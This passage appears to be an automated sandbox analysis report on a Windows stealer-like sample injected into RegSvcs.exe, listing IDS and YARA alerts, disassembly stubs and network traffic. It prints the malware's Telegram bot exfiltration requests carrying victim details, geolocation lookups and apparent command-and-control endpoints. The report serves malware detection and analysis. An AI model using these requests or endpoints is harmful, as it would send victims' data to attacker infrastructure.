                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0123FC19h8_2_0123F961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 069331E0h8_2_06932DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06930D0Dh8_2_06930B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06931697h8_2_06930B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06932C19h8_2_06932968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693E959h8_2_0693E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693E0A9h8_2_0693DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_06930673
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693F209h8_2_0693EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693CF49h8_2_0693CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 069331E0h8_2_06932DC3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693D7F9h8_2_0693D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693E501h8_2_0693E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693F661h8_2_0693F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693EDB1h8_2_0693EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693D3A1h8_2_0693D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693FAB9h8_2_0693F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_06930853
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_06930040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0693DC51h8_2_0693D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 069331E0h8_2_0693310E

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49751 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49772 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.4:49759 -> 178.210.170.40:587
                  Source: global trafficTCP traffic: 192.168.2.4:54663 -> 162.159.36.2:53
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:51:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49757 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49754 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 104.21.64.1:443
                  Source: global trafficTCP traffic: 192.168.2.4:49759 -> 178.210.170.40:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49731 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49755 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DCCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00DCCE44
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:51:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.standartasansor.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 17:46:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 17:47:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000002.00000002.2984782399.0000000005F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.standartasansor.com
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Sancerre.exe, 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000008.00000002.2973433634.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000002.00000002.2974305954.0000000002E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
